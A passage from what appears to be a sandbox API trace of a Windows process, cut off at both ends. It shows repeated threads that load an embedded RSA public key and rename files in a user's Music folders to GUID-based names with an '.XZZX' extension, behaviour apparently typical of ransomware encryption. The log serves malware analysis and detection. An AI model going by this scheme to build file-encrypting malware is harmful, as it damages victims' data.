lpString1="D02310330D7F24F9EA0895E311A00941.XZZX") returned="D02310330D7F24F9EA0895E311A00941.XZZX" [0188.845] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0188.845] SetErrorMode (uMode=0x1) returned 0x1 [0188.845] lstrcpyW (in: lpString1=0x2aaf860, lpString2="D02310330D7F24F9EA0895E311A00941.XZZX" | out: lpString1="D02310330D7F24F9EA0895E311A00941.XZZX") returned="D02310330D7F24F9EA0895E311A00941.XZZX" [0188.845] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x2571398c, Data2=0x2569, Data3=0x4224, Data4=([0]=0x82, [1]=0x61, [2]=0xe1, [3]=0x19, [4]=0xae, [5]=0x72, [6]=0x57, [7]=0x89))) returned 0x0 [0188.845] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\D02310330D7F24F9EA0895E311A00941.XZZX") returned 110 [0188.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0188.845] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\B8C1D66C09AA54C42571398C0C55390C.XZZX") returned 110 [0188.845] StrStrW (lpFirst="D02310330D7F24F9EA0895E311A00941.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 702 os_tid = 0xd58 [0189.001] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0189.001] lstrcpyW (in: lpString1=0x2aaf460, lpString2="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX" | out: lpString1="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX") returned="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX" [0189.001] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0189.001] SetErrorMode (uMode=0x1) returned 0x1 [0189.001] lstrcpyW (in: lpString1=0x2aaf860, lpString2="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX" | out: lpString1="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX") returned="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX" [0189.001] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x5aef5a16, Data2=0x83a5, Data3=0x47eb, Data4=([0]=0xa8, [1]=0x96, [2]=0xc5, [3]=0x6e, [4]=0xc9, [5]=0x21, [6]=0x49, [7]=0x4c))) returned 0x0 [0189.001] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\ED39CAB90CE3C63A3EAEA7271104AA82.XZZX") returned 110 [0189.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0189.001] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\175E522E24FB9B775AEF5A1627A67FBF.XZZX") returned 110 [0189.001] StrStrW (lpFirst="ED39CAB90CE3C63A3EAEA7271104AA82.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 703 os_tid = 0xd5c [0189.160] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0189.160] lstrcpyW (in: lpString1=0x2aaf460, lpString2="04BBA0D020119813F8F6E49024327C5B.XZZX" | out: lpString1="04BBA0D020119813F8F6E49024327C5B.XZZX") returned="04BBA0D020119813F8F6E49024327C5B.XZZX" [0189.160] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0189.160] SetErrorMode (uMode=0x1) returned 0x1 [0189.161] lstrcpyW (in: lpString1=0x2aaf860, lpString2="04BBA0D020119813F8F6E49024327C5B.XZZX" | out: lpString1="04BBA0D020119813F8F6E49024327C5B.XZZX") returned="04BBA0D020119813F8F6E49024327C5B.XZZX" [0189.161] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xecf87a85, Data2=0x95b1, Data3=0x407d, Data4=([0]=0xbe, [1]=0x81, [2]=0x82, [3]=0xf1, [4]=0xd1, [5]=0x75, [6]=0x57, [7]=0x6e))) returned 0x0 [0189.161] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\04BBA0D020119813F8F6E49024327C5B.XZZX") returned 116 [0189.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0189.161] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\771C1EF525B5576DECF87A8528603BB5.XZZX") returned 116 [0189.161] StrStrW (lpFirst="04BBA0D020119813F8F6E49024327C5B.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 704 os_tid = 0xd60 [0189.313] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0189.313] lstrcpyW (in: lpString1=0x2aaf460, lpString2="3006C810075ED0F01F3DE7C50B7FB538.XZZX" | out: lpString1="3006C810075ED0F01F3DE7C50B7FB538.XZZX") returned="3006C810075ED0F01F3DE7C50B7FB538.XZZX" [0189.313] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0189.313] SetErrorMode (uMode=0x1) returned 0x1 [0189.313] lstrcpyW (in: lpString1=0x2aaf860, lpString2="3006C810075ED0F01F3DE7C50B7FB538.XZZX" | out: lpString1="3006C810075ED0F01F3DE7C50B7FB538.XZZX") returned="3006C810075ED0F01F3DE7C50B7FB538.XZZX" [0189.313] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xe2f501c5, Data2=0x42e4, Data3=0x455e, Data4=([0]=0x91, [1]=0x35, [2]=0xee, [3]=0x11, [4]=0xe5, [5]=0x68, [6]=0x86, [7]=0x6f))) returned 0x0 [0189.313] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\3006C810075ED0F01F3DE7C50B7FB538.XZZX") returned 116 [0189.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0189.313] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\4CAA5D74122003B8E2F501C514CAE800.XZZX") returned 116 [0189.313] StrStrW (lpFirst="3006C810075ED0F01F3DE7C50B7FB538.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 705 os_tid = 0xd68 [0189.469] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0189.469] lstrcpyW (in: lpString1=0x2aaf460, lpString2="8F1540B007AB3EF89A8099C80BCC2340.XZZX" | out: lpString1="8F1540B007AB3EF89A8099C80BCC2340.XZZX") returned="8F1540B007AB3EF89A8099C80BCC2340.XZZX" [0189.469] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0189.469] SetErrorMode (uMode=0x1) returned 0x1 [0189.469] lstrcpyW (in: lpString1=0x2aaf860, lpString2="8F1540B007AB3EF89A8099C80BCC2340.XZZX" | out: lpString1="8F1540B007AB3EF89A8099C80BCC2340.XZZX") returned="8F1540B007AB3EF89A8099C80BCC2340.XZZX" [0189.469] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xc5b3ce40, Data2=0x54cd, Data3=0x40f6, Data4=([0]=0x97, [1]=0xd9, [2]=0x2c, [3]=0x70, [4]=0x74, [5]=0x39, [6]=0x8c, [7]=0x5a))) returned 0x0 [0189.469] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\8F1540B007AB3EF89A8099C80BCC2340.XZZX") returned 116 [0189.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0189.469] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\50A929401584BCFEC5B3CE40182FA146.XZZX") returned 116 [0189.469] StrStrW (lpFirst="8F1540B007AB3EF89A8099C80BCC2340.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 706 os_tid = 0xd6c [0189.625] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0189.625] lstrcpyW (in: lpString1=0x2aaf460, lpString2="B02B14800A31A4C0C9DC8D360E528908.XZZX" | out: lpString1="B02B14800A31A4C0C9DC8D360E528908.XZZX") returned="B02B14800A31A4C0C9DC8D360E528908.XZZX" [0189.625] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0189.625] SetErrorMode (uMode=0x1) returned 0x1 [0189.625] lstrcpyW (in: lpString1=0x2aaf860, lpString2="B02B14800A31A4C0C9DC8D360E528908.XZZX" | out: lpString1="B02B14800A31A4C0C9DC8D360E528908.XZZX") returned="B02B14800A31A4C0C9DC8D360E528908.XZZX" [0189.625] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x615d56b3, Data2=0x140e, Data3=0x417a, Data4=([0]=0xbb, [1]=0x6b, [2]=0x80, [3]=0xf7, [4]=0x6c, [5]=0xc9, [6]=0x49, [7]=0xa5))) returned 0x0 [0189.625] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\B02B14800A31A4C0C9DC8D360E528908.XZZX") returned 116 [0189.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0189.625] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\9DE0B9CA05211CAC615D56B307CC00F4.XZZX") returned 116 [0189.625] StrStrW (lpFirst="B02B14800A31A4C0C9DC8D360E528908.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 707 os_tid = 0xd94 Thread: id = 708 os_tid = 0xd9c [0189.781] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0189.781] lstrcpyW (in: lpString1=0x2caf460, lpString2="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX" | out: lpString1="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX") returned="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX" [0189.781] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0189.781] SetErrorMode (uMode=0x1) returned 0x1 [0189.781] lstrcpyW (in: lpString1=0x2caf860, lpString2="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX" | out: lpString1="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX") returned="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX" [0189.781] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x2d3cda3d, Data2=0x9334, Data3=0x4379, Data4=([0]=0xb7, [1]=0x65, [2]=0x4e, [3]=0x44, [4]=0xc8, [5]=0x9e, [6]=0x84, [7]=0xc0))) returned 0x0 [0189.781] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX") returned 116 [0189.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0189.781] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\21AD5B6426CC2F942D3CDA3D299713DC.XZZX") returned 116 [0189.781] StrStrW (lpFirst="B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 709 os_tid = 0xda0 [0189.937] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0189.937] lstrcpyW (in: lpString1=0x2caf460, lpString2="FA78694804C1E3566FC4CB7C08F6C79E.XZZX" | out: lpString1="FA78694804C1E3566FC4CB7C08F6C79E.XZZX") returned="FA78694804C1E3566FC4CB7C08F6C79E.XZZX" [0189.937] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0189.937] SetErrorMode (uMode=0x1) returned 0x1 [0189.937] lstrcpyW (in: lpString1=0x2caf860, lpString2="FA78694804C1E3566FC4CB7C08F6C79E.XZZX" | out: lpString1="FA78694804C1E3566FC4CB7C08F6C79E.XZZX") returned="FA78694804C1E3566FC4CB7C08F6C79E.XZZX" [0189.937] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x7e5970f7, Data2=0x8556, Data3=0x445b, Data4=([0]=0x86, [1]=0x7c, [2]=0x77, [3]=0x6b, [4]=0xd, [5]=0x66, [6]=0xfa, [7]=0xe2))) returned 0x0 [0189.937] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\FA78694804C1E3566FC4CB7C08F6C79E.XZZX") returned 116 [0189.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0189.937] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: 